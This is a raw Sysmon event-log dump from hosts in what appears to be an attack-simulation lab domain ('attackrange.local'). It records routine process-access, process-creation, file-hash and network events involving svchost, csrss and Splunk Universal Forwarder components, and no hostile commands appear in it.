08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.931{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.918{0C1E0330-F69A-60EB-AF79-00000000D001}1436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.915{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F91A4437C6BF0FFA6F399D3C4B1EBC9,SHA256=0C14CF0FBAC780A64DD148F427BC27DF159F4B6BFE05A4F05524A4429854B6E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.915{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CE07D3D07248F27564C05BF4FA0DD83,SHA256=C220CDE339505C39CF2266D11F5DEBD942FBB8CEDED31F578A5799E315E11D8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:18.587{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51146-false10.0.1.12-8000- 23542300x80000000000000001052039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:26.021{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7499C701D7035F51B43F5323DADA55A9,SHA256=E964B8C1FB04FA7CEDD32966C37114EA0AEC975C8B6F1354C62CA88D39DD2075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809035Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.415{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.400{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:26.400{0C1E0330-F69A-60EB-AE79-00000000D001}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:27.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=617F1D9416016F1219524314389FA147,SHA256=827074A42A33476A7C27902AAFB3E8A572023501B316219B7F493D2E16AE90B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A1DDD98656416986977B83C6C09C657,SHA256=676B5BCAFCDB15E357967EE5BC625FBB6CF350EF2AEC421CB8E3E48A79A7FCBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F69B-60EB-B079-00000000D001}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809072Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809071Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809070Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:27.618{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809069Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 